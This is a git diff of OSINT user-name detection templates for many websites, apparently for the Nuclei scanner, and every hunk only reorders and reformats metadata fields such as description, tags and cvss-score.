@@ id: 7dach info: name: 7dach User Name Information - Detect author: dwisiswant0 - description: 7dach user name information check was conducted. severity: info + description: 7dach user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,7dach metadata: max-request: 1 + tags: osint,osint-social,7dach self-contained: true + http: - method: GET path: diff --git a/http/osint/aaha-chat.yaml b/http/osint/aaha-chat.yaml index 6ae18787c0..43d0ee64c9 100644 --- a/http/osint/aaha-chat.yaml +++ b/http/osint/aaha-chat.yaml @@ -3,17 +3,18 @@ id: aaha-chat info: name: Aaha chat User Name Information - Detect author: dwisiswant0 - description: Aaha chat user name information check was conducted. severity: info + description: Aaha chat user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,aaha-chat metadata: max-request: 1 + tags: osint,osint-social,aaha-chat self-contained: true + http: - method: GET path: diff --git a/http/osint/aboutme.yaml b/http/osint/aboutme.yaml index ea59619b34..88a1b2b79a 100644 --- a/http/osint/aboutme.yaml +++ b/http/osint/aboutme.yaml @@ -3,17 +3,18 @@ id: aboutme info: name: About.me User Name Information - Detect author: dwisiswant0 - description: About.me user name information check was conducted. severity: info + description: About.me user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,aboutme metadata: max-request: 1 + tags: osint,osint-social,aboutme self-contained: true + http: - method: GET path: diff --git a/http/osint/acf.yaml b/http/osint/acf.yaml index 5da198ddf0..d5bd7d14a7 100644 --- a/http/osint/acf.yaml +++ b/http/osint/acf.yaml @@ -3,17 +3,18 @@ id: acf info: name: ACF User Name Information - Detect author: dwisiswant0 - description: ACF user name information check was conducted. severity: info + description: ACF user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,acf metadata: max-request: 1 + tags: osint,osint-coding,acf self-contained: true + http: - method: GET path: diff --git a/http/osint/admire-me.yaml b/http/osint/admire-me.yaml index 443714d521..90dcaa8c88 100644 --- a/http/osint/admire-me.yaml +++ b/http/osint/admire-me.yaml @@ -3,17 +3,18 @@ id: admire-me info: name: Admire me User Name Information - Detect author: dwisiswant0 - description: Admire me user name information check was conducted. severity: info + description: Admire me user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,admire-me metadata: max-request: 1 + tags: osint,osint-porn,admire-me self-contained: true + http: - method: GET path: diff --git a/http/osint/adult-forum.yaml b/http/osint/adult-forum.yaml index c70fe0b96c..d97d1b9032 100644 --- a/http/osint/adult-forum.yaml +++ b/http/osint/adult-forum.yaml @@ -3,17 +3,18 @@ id: adult-forum info: name: Adult Forum User Name Information - Detect author: dwisiswant0 - description: Adult Forum user name information check was conducted. severity: info + description: Adult Forum user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,adult-forum metadata: max-request: 1 + tags: osint,osint-porn,adult-forum self-contained: true + http: - method: GET path: diff --git a/http/osint/adultism.yaml b/http/osint/adultism.yaml index b141ec16a5..c65625231b 100644 --- a/http/osint/adultism.yaml +++ b/http/osint/adultism.yaml @@ -3,17 +3,18 @@ id: adultism info: name: Adultism User Name Information - Detect author: dwisiswant0 - description: Adultism user name information check was conducted. severity: info + description: Adultism user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,adultism metadata: max-request: 1 + tags: osint,osint-porn,adultism self-contained: true + http: - method: GET path: diff --git a/http/osint/advfn.yaml b/http/osint/advfn.yaml index 89eab55d67..e0d27fcb6d 100644 --- a/http/osint/advfn.yaml +++ b/http/osint/advfn.yaml @@ -3,17 +3,18 @@ id: advfn info: name: ADVFN User Name Information - Detect author: dwisiswant0 - description: ADVFN user name information check was conducted. severity: info + description: ADVFN user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,advfn metadata: max-request: 1 + tags: osint,osint-finance,advfn self-contained: true + http: - method: GET path: diff --git a/http/osint/aflam.yaml b/http/osint/aflam.yaml index bec96989be..892703c0b9 100644 --- a/http/osint/aflam.yaml +++ b/http/osint/aflam.yaml @@ -3,17 +3,18 @@ id: aflam info: name: Aflam User Name Information - Detect author: dwisiswant0 - description: Aflam user name information check was conducted. severity: info + description: Aflam user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,aflam metadata: max-request: 1 + tags: osint,osint-misc,aflam self-contained: true + http: - method: GET path: diff --git a/http/osint/airline-pilot-life.yaml b/http/osint/airline-pilot-life.yaml index b71a745f9e..6cb2b819c3 100644 --- a/http/osint/airline-pilot-life.yaml +++ b/http/osint/airline-pilot-life.yaml @@ -3,17 +3,18 @@ id: airline-pilot-life info: name: Airline Pilot Life User Name Information - Detect author: dwisiswant0 - description: Airline Pilot Life user name information check was conducted. severity: info + description: Airline Pilot Life user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,airline-pilot-life metadata: max-request: 1 + tags: osint,osint-social,airline-pilot-life self-contained: true + http: - method: GET path: diff --git a/http/osint/airliners.yaml b/http/osint/airliners.yaml index a64709c3de..93ce706754 100644 --- a/http/osint/airliners.yaml +++ b/http/osint/airliners.yaml @@ -3,17 +3,18 @@ id: airliners info: name: Airliners User Name Information - Detect author: dwisiswant0 - description: Airliners user name information check was conducted. severity: info + description: Airliners user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,airliners metadata: max-request: 1 + tags: osint,osint-social,airliners self-contained: true + http: - method: GET path: diff --git a/http/osint/akniga.yaml b/http/osint/akniga.yaml index 6a78b1e738..92cc8f58e1 100644 --- a/http/osint/akniga.yaml +++ b/http/osint/akniga.yaml @@ -3,17 +3,18 @@ id: akniga info: name: Akniga User Name Information - Detect author: dwisiswant0 - description: Akniga user name information check was conducted. severity: info + description: Akniga user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,akniga metadata: max-request: 1 + tags: osint,osint-hobby,akniga self-contained: true + http: - method: GET path: diff --git a/http/osint/albicla.yaml b/http/osint/albicla.yaml index 56096d679f..b193c6e3ea 100644 --- a/http/osint/albicla.yaml +++ b/http/osint/albicla.yaml @@ -3,17 +3,18 @@ id: albicla info: name: Albicla User Name Information - Detect author: dwisiswant0 - description: Albicla user name information check was conducted. severity: info + description: Albicla user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,albicla metadata: max-request: 1 + tags: osint,osint-social,albicla self-contained: true + http: - method: GET path: diff --git a/http/osint/alik.yaml b/http/osint/alik.yaml index b22d8897c5..5e1b019a85 100644 --- a/http/osint/alik.yaml +++ b/http/osint/alik.yaml @@ -3,17 +3,18 @@ id: alik info: name: Alik User Name Information - Detect author: dwisiswant0 - description: Alik user name information check was conducted. severity: info + description: Alik user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,alik metadata: max-request: 1 + tags: osint,osint-social,alik self-contained: true + http: - method: GET path: diff --git a/http/osint/allesovercrypto.yaml b/http/osint/allesovercrypto.yaml index 107cdc88e3..f4af219805 100644 --- a/http/osint/allesovercrypto.yaml +++ b/http/osint/allesovercrypto.yaml @@ -3,17 +3,18 @@ id: allesovercrypto info: name: Allesovercrypto User Name Information - Detect author: dwisiswant0 - description: Allesovercrypto user name information check was conducted. severity: info + description: Allesovercrypto user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-finance,allesovercrypto metadata: max-request: 1 + tags: osint,osint-finance,allesovercrypto self-contained: true + http: - method: GET path: diff --git a/http/osint/allmylinks.yaml b/http/osint/allmylinks.yaml index 222e43a8cf..db3c119fc4 100644 --- a/http/osint/allmylinks.yaml +++ b/http/osint/allmylinks.yaml @@ -3,17 +3,18 @@ id: allmylinks info: name: Allmylinks User Name Information - Detect author: dwisiswant0 - description: Allmylinks user name information check was conducted. severity: info + description: Allmylinks user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,allmylinks metadata: max-request: 1 + tags: osint,osint-social,allmylinks self-contained: true + http: - method: GET path: diff --git a/http/osint/alloannonces.yaml b/http/osint/alloannonces.yaml index eba0ee7bfc..a9aed0f520 100644 --- a/http/osint/alloannonces.yaml +++ b/http/osint/alloannonces.yaml @@ -3,17 +3,18 @@ id: alloannonces info: name: Alloannonces User Name Information - Detect author: dwisiswant0 - description: Alloannonces user name information check was conducted. severity: info + description: Alloannonces user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,alloannonces metadata: max-request: 1 + tags: osint,osint-social,alloannonces self-contained: true + http: - method: GET path: diff --git a/http/osint/alltrails.yaml b/http/osint/alltrails.yaml index 82f0b830e6..cce51281a2 100644 --- a/http/osint/alltrails.yaml +++ b/http/osint/alltrails.yaml @@ -3,17 +3,18 @@ id: alltrails info: name: AllTrails User Name Information - Detect author: dwisiswant0 - description: AllTrails user name information check was conducted. severity: info + description: AllTrails user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-health,alltrails metadata: max-request: 1 + tags: osint,osint-health,alltrails self-contained: true + http: - method: GET path: diff --git a/http/osint/ameblo.yaml b/http/osint/ameblo.yaml index 6a7c387ac6..251296f93a 100644 --- a/http/osint/ameblo.yaml +++ b/http/osint/ameblo.yaml @@ -3,17 +3,18 @@ id: ameblo info: name: Ameblo User Name Information - Detect author: dwisiswant0 - description: Ameblo user name information check was conducted. severity: info + description: Ameblo user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-blog,ameblo metadata: max-request: 1 + tags: osint,osint-blog,ameblo self-contained: true + http: - method: GET path: diff --git a/http/osint/americanthinker.yaml b/http/osint/americanthinker.yaml index 9e37d2e4d7..f6ef3a2c4b 100644 --- a/http/osint/americanthinker.yaml +++ b/http/osint/americanthinker.yaml @@ -3,17 +3,18 @@ id: americanthinker info: name: AmericanThinker User Name Information - Detect author: dwisiswant0 - description: AmericanThinker user name information check was conducted. severity: info + description: AmericanThinker user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-political,americanthinker metadata: max-request: 1 + tags: osint,osint-political,americanthinker self-contained: true + http: - method: GET path: diff --git a/http/osint/animeplanet.yaml b/http/osint/animeplanet.yaml index e538191e24..91766b90c7 100644 --- a/http/osint/animeplanet.yaml +++ b/http/osint/animeplanet.yaml @@ -3,17 +3,18 @@ id: animeplanet info: name: AnimePlanet User Name Information - Detect author: dwisiswant0 - description: AnimePlanet user name information check was conducted. severity: info + description: AnimePlanet user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,animeplanet metadata: max-request: 1 + tags: osint,osint-social,animeplanet self-contained: true + http: - method: GET path: diff --git a/http/osint/anobii.yaml b/http/osint/anobii.yaml index b130667f13..e4b37360bc 100644 --- a/http/osint/anobii.yaml +++ b/http/osint/anobii.yaml @@ -3,17 +3,18 @@ id: anobii info: name: ANobii User Name Information - Detect author: dwisiswant0 - description: ANobii user name information check was conducted. severity: info + description: ANobii user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,anobii metadata: max-request: 1 + tags: osint,osint-hobby,anobii self-contained: true + http: - method: GET path: diff --git a/http/osint/anonup.yaml b/http/osint/anonup.yaml index 04ec7b7f1b..211dd1a7bf 100644 --- a/http/osint/anonup.yaml +++ b/http/osint/anonup.yaml @@ -3,17 +3,18 @@ id: anonup info: name: Anonup User Name Information - Detect author: dwisiswant0 - description: Anonup user name information check was conducted. severity: info + description: Anonup user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,anonup metadata: max-request: 1 + tags: osint,osint-social,anonup self-contained: true + http: - method: GET path: diff --git a/http/osint/apex-legends.yaml b/http/osint/apex-legends.yaml index e129b17a50..780aa6e3a4 100644 --- a/http/osint/apex-legends.yaml +++ b/http/osint/apex-legends.yaml @@ -3,17 +3,18 @@ id: apex-legends info: name: Apex Legends User Name Information - Detect author: dwisiswant0 - description: Apex Legends user name information check was conducted. severity: info + description: Apex Legends user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,apex-legends metadata: max-request: 1 + tags: osint,osint-gaming,apex-legends self-contained: true + http: - method: GET path: diff --git a/http/osint/appian.yaml b/http/osint/appian.yaml index 04ea0f78d0..8b3b8fcf96 100644 --- a/http/osint/appian.yaml +++ b/http/osint/appian.yaml @@ -3,17 +3,18 @@ id: appian info: name: Appian User Name Information - Detect author: dwisiswant0 - description: Appian user name information check was conducted. severity: info + description: Appian user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,appian metadata: max-request: 1 + tags: osint,osint-tech,appian self-contained: true + http: - method: GET path: diff --git a/http/osint/apteka.yaml b/http/osint/apteka.yaml index 3a99a07046..2b24bf08ec 100644 --- a/http/osint/apteka.yaml +++ b/http/osint/apteka.yaml @@ -3,17 +3,18 @@ id: apteka info: name: Apteka User Name Information - Detect author: dwisiswant0 - description: Apteka user name information check was conducted. severity: info + description: Apteka user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,apteka metadata: max-request: 1 + tags: osint,osint-social,apteka self-contained: true + http: - method: GET path: diff --git a/http/osint/archive-of-our-own-account.yaml b/http/osint/archive-of-our-own-account.yaml index b34c082085..32ec8dc171 100644 --- a/http/osint/archive-of-our-own-account.yaml +++ b/http/osint/archive-of-our-own-account.yaml @@ -3,17 +3,18 @@ id: archive-of-our-own-account info: name: Archive Of Our Own Account User Name Information - Detect author: dwisiswant0 - description: Archive Of Our Own Account user name information check was conducted. severity: info + description: Archive Of Our Own Account user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-hobby,archive-of-our-own-account metadata: max-request: 1 + tags: osint,osint-hobby,archive-of-our-own-account self-contained: true + http: - method: GET path: diff --git a/http/osint/arduino.yaml b/http/osint/arduino.yaml index 4129fa29cb..6c7da1342b 100644 --- a/http/osint/arduino.yaml +++ b/http/osint/arduino.yaml @@ -3,17 +3,18 @@ id: arduino info: name: Arduino User Name Information - Detect author: dwisiswant0 - description: Arduino user name information check was conducted. severity: info + description: Arduino user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-tech,arduino metadata: max-request: 1 + tags: osint,osint-tech,arduino self-contained: true + http: - method: GET path: diff --git a/http/osint/armorgames.yaml b/http/osint/armorgames.yaml index 1bc9453bfa..6df3063a5c 100644 --- a/http/osint/armorgames.yaml +++ b/http/osint/armorgames.yaml @@ -3,17 +3,18 @@ id: armorgames info: name: ArmorGames User Name Information - Detect author: dwisiswant0 - description: ArmorGames user name information check was conducted. severity: info + description: ArmorGames user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-gaming,armorgames metadata: max-request: 1 + tags: osint,osint-gaming,armorgames self-contained: true + http: - method: GET path: diff --git a/http/osint/artbreeder.yaml b/http/osint/artbreeder.yaml index c731e11df4..442b33a5d7 100644 --- a/http/osint/artbreeder.yaml +++ b/http/osint/artbreeder.yaml @@ -3,17 +3,18 @@ id: artbreeder info: name: ArtBreeder User Name Information - Detect author: dwisiswant0 - description: ArtBreeder user name information check was conducted. severity: info + description: ArtBreeder user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,artbreeder metadata: max-request: 1 + tags: osint,osint-art,artbreeder self-contained: true + http: - method: GET path: diff --git a/http/osint/artists-clients.yaml b/http/osint/artists-clients.yaml index 2b45815bed..bdf6219efd 100644 --- a/http/osint/artists-clients.yaml +++ b/http/osint/artists-clients.yaml @@ -3,17 +3,18 @@ id: artists-clients info: name: Artists & Clients User Name Information - Detect author: dwisiswant0 - description: Artists & Clients user name information check was conducted. severity: info + description: Artists & Clients user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,artists-clients metadata: max-request: 1 + tags: osint,osint-art,artists-clients self-contained: true + http: - method: GET path: diff --git a/http/osint/artstation.yaml b/http/osint/artstation.yaml index b62837ca18..807cb60734 100644 --- a/http/osint/artstation.yaml +++ b/http/osint/artstation.yaml @@ -3,17 +3,18 @@ id: artstation info: name: ArtStation User Name Information - Detect author: dwisiswant0 - description: ArtStation user name information check was conducted. severity: info + description: ArtStation user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-art,artstation metadata: max-request: 1 + tags: osint,osint-art,artstation self-contained: true + http: - method: GET path: diff --git a/http/osint/asciinema.yaml b/http/osint/asciinema.yaml index 5119a71c8b..4a35dd9e39 100644 --- a/http/osint/asciinema.yaml +++ b/http/osint/asciinema.yaml @@ -3,17 +3,18 @@ id: asciinema info: name: Asciinema User Name Information - Detect author: dwisiswant0 - description: Asciinema user name information check was conducted. severity: info + description: Asciinema user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-coding,asciinema metadata: max-request: 1 + tags: osint,osint-coding,asciinema self-contained: true + http: - method: GET path: diff --git a/http/osint/askfm.yaml b/http/osint/askfm.yaml index 328295e32b..a28e455345 100644 --- a/http/osint/askfm.yaml +++ b/http/osint/askfm.yaml @@ -3,17 +3,18 @@ id: askfm info: name: Ask.fm User Name Information - Detect author: dwisiswant0 - description: Ask.fm user name information check was conducted. severity: info + description: Ask.fm user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,askfm metadata: max-request: 1 + tags: osint,osint-social,askfm self-contained: true + http: - method: GET path: diff --git a/http/osint/audiojungle.yaml b/http/osint/audiojungle.yaml index 68afc3fdbb..0ede52cb49 100644 --- a/http/osint/audiojungle.yaml +++ b/http/osint/audiojungle.yaml @@ -3,17 +3,18 @@ id: audiojungle info: name: Audiojungle User Name Information - Detect author: dwisiswant0 - description: Audiojungle user name information check was conducted. severity: info + description: Audiojungle user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,audiojungle metadata: max-request: 1 + tags: osint,osint-music,audiojungle self-contained: true + http: - method: GET path: diff --git a/http/osint/auru.yaml b/http/osint/auru.yaml index 9ac8266cfc..cbeb4f1ad5 100644 --- a/http/osint/auru.yaml +++ b/http/osint/auru.yaml @@ -3,17 +3,18 @@ id: auru info: name: Au.ru User Name Information - Detect author: dwisiswant0 - description: Au.ru user name information check was conducted. severity: info + description: Au.ru user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,auru metadata: max-request: 1 + tags: osint,osint-misc,auru self-contained: true + http: - method: GET path: diff --git a/http/osint/authorstream.yaml b/http/osint/authorstream.yaml index dbe4bf15b9..5a814e4e52 100644 --- a/http/osint/authorstream.yaml +++ b/http/osint/authorstream.yaml @@ -3,17 +3,18 @@ id: authorstream info: name: AuthorSTREAM User Name Information - Detect author: dwisiswant0 - description: AuthorSTREAM user name information check was conducted. severity: info + description: AuthorSTREAM user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,authorstream metadata: max-request: 1 + tags: osint,osint-social,authorstream self-contained: true + http: - method: GET path: diff --git a/http/osint/avid-community.yaml b/http/osint/avid-community.yaml index 41e65a211c..0a67862e83 100644 --- a/http/osint/avid-community.yaml +++ b/http/osint/avid-community.yaml @@ -3,17 +3,18 @@ id: avid-community info: name: Avid Community User Name Information - Detect author: dwisiswant0 - description: Avid Community user name information check was conducted. severity: info + description: Avid Community user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,avid-community metadata: max-request: 1 + tags: osint,osint-music,avid-community self-contained: true + http: - method: GET path: diff --git a/http/osint/babepedia.yaml b/http/osint/babepedia.yaml index b26788781c..a3fdbd2bae 100644 --- a/http/osint/babepedia.yaml +++ b/http/osint/babepedia.yaml @@ -3,17 +3,18 @@ id: babepedia info: name: Babepedia User Name Information - Detect author: dwisiswant0 - description: Babepedia user name information check was conducted. severity: info + description: Babepedia user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,babepedia metadata: max-request: 1 + tags: osint,osint-porn,babepedia self-contained: true + http: - method: GET path: diff --git a/http/osint/babypips.yaml b/http/osint/babypips.yaml index 2e624a75ae..5042cf6dc8 100644 --- a/http/osint/babypips.yaml +++ b/http/osint/babypips.yaml @@ -3,17 +3,18 @@ id: babypips info: name: BabyPips User Name Information - Detect author: dwisiswant0 - description: BabyPips user name information check was conducted. severity: info + description: BabyPips user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-social,babypips metadata: max-request: 1 + tags: osint,osint-social,babypips self-contained: true + http: - method: GET path: diff --git a/http/osint/bandcamp.yaml b/http/osint/bandcamp.yaml index b2f5a3a793..a965f3c308 100644 --- a/http/osint/bandcamp.yaml +++ b/http/osint/bandcamp.yaml @@ -3,17 +3,18 @@ id: bandcamp info: name: Bandcamp User Name Information - Detect author: dwisiswant0 - description: Bandcamp user name information check was conducted. severity: info + description: Bandcamp user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,bandcamp metadata: max-request: 1 + tags: osint,osint-music,bandcamp self-contained: true + http: - method: GET path: diff --git a/http/osint/bandlab.yaml b/http/osint/bandlab.yaml index 403cbcb7a1..0ebdf974d1 100644 --- a/http/osint/bandlab.yaml +++ b/http/osint/bandlab.yaml @@ -3,17 +3,18 @@ id: bandlab info: name: Bandlab User Name Information - Detect author: dwisiswant0 - description: Bandlab user name information check was conducted. severity: info + description: Bandlab user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-music,bandlab metadata: max-request: 1 + tags: osint,osint-music,bandlab self-contained: true + http: - method: GET path: diff --git a/http/osint/bblog-ru.yaml b/http/osint/bblog-ru.yaml index fbc15fedb5..bb45cf73eb 100644 --- a/http/osint/bblog-ru.yaml +++ b/http/osint/bblog-ru.yaml @@ -3,17 +3,18 @@ id: bblog-ru info: name: Bblog ru User Name Information - Detect author: dwisiswant0 - description: Bblog ru user name information check was conducted. severity: info + description: Bblog ru user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-misc,bblog-ru metadata: max-request: 1 + tags: osint,osint-misc,bblog-ru self-contained: true + http: - method: GET path: diff --git a/http/osint/bdsmlr.yaml b/http/osint/bdsmlr.yaml index 8182769e11..ab6cff03a4 100644 --- a/http/osint/bdsmlr.yaml +++ b/http/osint/bdsmlr.yaml @@ -3,17 +3,18 @@ id: bdsmlr info: name: BDSMLR User Name Information - Detect author: dwisiswant0 - description: BDSMLR user name information check was conducted. severity: info + description: BDSMLR user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,bdsmlr metadata: max-request: 1 + tags: osint,osint-porn,bdsmlr self-contained: true + http: - method: GET path: diff --git a/http/osint/bdsmsingles.yaml b/http/osint/bdsmsingles.yaml index 8e25420536..00199f6f9d 100644 --- a/http/osint/bdsmsingles.yaml +++ b/http/osint/bdsmsingles.yaml @@ -3,17 +3,18 @@ id: bdsmsingles info: name: Bdsmsingles User Name Information - Detect author: dwisiswant0 - description: Bdsmsingles user name information check was conducted. severity: info + description: Bdsmsingles user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-porn,bdsmsingles metadata: max-request: 1 + tags: osint,osint-porn,bdsmsingles self-contained: true + http: - method: GET path: diff --git a/http/osint/behance.yaml b/http/osint/behance.yaml index 29c8ddd757..c065beae86 100644 --- a/http/osint/behance.yaml +++ b/http/osint/behance.yaml @@ -3,17 +3,18 @@ id: behance info: name: Behance User Name Information - Detect author: dwisiswant0 - description: Behance user name information check was conducted. severity: info + description: Behance user name information check was conducted. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: osint,osint-business,behance 